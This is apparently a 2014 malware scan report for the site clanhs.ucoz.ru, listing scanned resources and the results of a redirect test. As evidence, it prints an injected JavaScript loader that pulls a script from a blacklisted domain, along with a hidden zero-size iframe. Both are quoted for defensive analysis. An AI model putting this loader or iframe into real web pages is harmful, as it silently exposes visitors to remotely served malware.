Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=clanhs.ucoz.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://clanhs.ucoz.ru/ | 200 OK Content-Length: 49485 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: oqme.about-home.info (function(w) { var script = document.createElement('script'); var i = setInterval(function() { if (typeof w.document.body !== 'undefined') { script.src = 'http://oqme.about-home.info' + '/?538449=JWwlI3czPT4yOjg1ImxgYWRoY2c'; w.document.body.appendChild(script); clearInterval(i); } }, 200); })(window); Decoded script: function () { if (typeof w.document.body !== "undefined") { script.src = "http://oqme.about-home.info/?548044=uPG4vuquoKOvp6Wov_H9_Pn1_vs"; w.document.body.appendChild(script); clearInterval(i); } } /*** called setInterval with function () { if (typeof w.document.body !== "undefined") { script.src = "http://oqme.about-home.info/?548044=uPG4vuquoKOvp6Wov_H9_Pn1_vs"; w.document.body.appendChild(script); clearInterval(i); } }, 200 */ Hidden iFrame found. size: 0x0 src: http://ga1.net.ru/ <iframe src="http://ga1.net.ru/" name="iframe" width="0%" height="0%" scrolling="no" frameborder=0> | ||
http://nativevat.hol.es/rases.txt | HTTP/1.1 404 Not Found Connection: close Date: Wed, 30 Jul 2014 07:04:32 GMT Server: Apache Content-Length: 170 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | clean |
http://www.hostinger.lt/klaida_404? | 200 OK Content-Length: 10701 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js | 200 OK Content-Length: 91556 Content-Type: text/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.14/jquery-ui.min.js | 200 OK Content-Length: 201658 Content-Type: text/javascript | clean |
http://nativevat.hol.es/js/site.php | HTTP/1.1 404 Not Found Connection: close Date: Wed, 30 Jul 2014 07:04:33 GMT Server: Apache Content-Length: 170 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | clean |
http://www.hostinger.lt/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://pjatnuchanu.ucoz.ua/adblock.txt | 200 OK Content-Length: 3082 Content-Type: text/plain | clean |
http://s40.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s40.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22618 Content-Type: text/javascript | clean |
http://s40.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://mobmas.ru/s/948 | HTTP/1.1 302 Found Cache-Control: no-cache, must-relative Connection: close Date: Wed, 30 Jul 2014 07:04:36 GMT Location: http://iqmasa.ru/88ufzxjs4ri8s9byuoxhqsqjitkh9p1 Server: Apache Content-Length: 2114 Content-Type: text/html; charset=utf-8 Last-Modified: Wed, 30 Jul 2014 07:04:36 GMT X-Powered-By: PHP/5.2.17 | clean |
http://iqmasa.ru/88ufzxjs4ri8s9byuoxhqsqjitkh9p1 | 200 OK Content-Length: 7987 Content-Type: text/javascript | clean |
http://clck.ru/98oGG | HTTP/1.1 302 FOUND Connection: close Date: Wed, 30 Jul 2014 07:04:36 GMT Location: http://iqmasa.ru/963qlrfreov6bjcvlwlslw1af3d31nbp Server: nginx/1.4.4 Content-Length: 305 Content-Type: text/html; charset=utf-8 | clean |
http://iqmasa.ru/963qlrfreov6bjcvlwlslw1af3d31nbp | 200 OK Content-Length: 7939 Content-Type: text/javascript | clean |
http://writeln.ru/b/get.php?id=5568 | 404 Not Found Content-Length: 1479 Content-Type: text/html | clean |
http://writeln.ru/ | 200 OK Content-Length: 2274 Content-Type: text/html | clean |
http://writeln.ru/new/ | 200 OK Content-Length: 2274 Content-Type: text/html | clean |
http://writeln.ru/actions/ | 200 OK Content-Length: 2274 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: clanhs.ucoz.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 30 Jul 2014 07:04:30 GMT
Server: uServ/3.2.2
Content-Length: 49485
Content-Type: text/html; charset=UTF-8
...49485 bytes of data.
GET / HTTP/1.1
Host: clanhs.ucoz.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 30 Jul 2014 07:04:30 GMT
Server: uServ/3.2.2
Content-Length: 49485
Content-Type: text/html; charset=UTF-8
...49485 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: clanhs.ucoz.ru
Referer: http://www.google.com/search?q=clanhs.ucoz.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: clanhs.ucoz.ru
Referer: http://www.google.com/search?q=clanhs.ucoz.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.